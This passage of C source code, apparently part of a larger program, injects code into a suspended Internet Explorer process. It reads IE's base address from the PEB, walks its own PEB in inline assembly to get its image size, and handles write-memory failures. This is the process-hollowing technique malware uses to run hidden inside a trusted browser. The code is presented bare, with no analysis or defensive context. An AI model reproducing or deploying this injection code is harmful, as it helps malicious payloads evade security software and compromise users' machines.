}
else
{
printf("WirteMemory Failed,code:%d\r\n",GetLastError());
TerminateProcess(pi.hProcess, 0);
}
}
else
{
printf("VirtualMemory Failed,code:%d\r\n",GetLastError());
TerminateProcess(pi.hProcess, 0);
}
}
return TRUE;
}
DWORD GetSelfImageSize(HMODULE hModule)
{
DWORD dwImageSize;
_asm
{
mov ecx,0x30
mov eax, fs:[ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x0c]
add esi,0x20
lodsd
mov dwImageSize,eax
}
return dwImageSize;
}
BOOL CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
)
{
STARTUPINFO si = {0};
DWORD *PPEB;
DWORD read;
// 使用挂起模式启动ie
if( CreateProcess(
NULL,
szIePath,
NULL,
NULL,
0,
CREATE_SUSPENDED,
NULL,
NULL,
&si,
pi
) )
{
pThreadCxt->ContextFlags = CONTEXT_FULL;
GetThreadContext(pi->hThread, pThreadCxt);
PPEB = (DWORD *)pThreadCxt->Ebx;
// 得到ie的装载基地址
ReadProcessMemory(
pi->hProcess,
&PPEB[2],
(LPVOID)&(pChildProcess->dwBaseAddress),
sizeof(DWORD),
&read
);
return TRUE ;
}
return FALSE;
}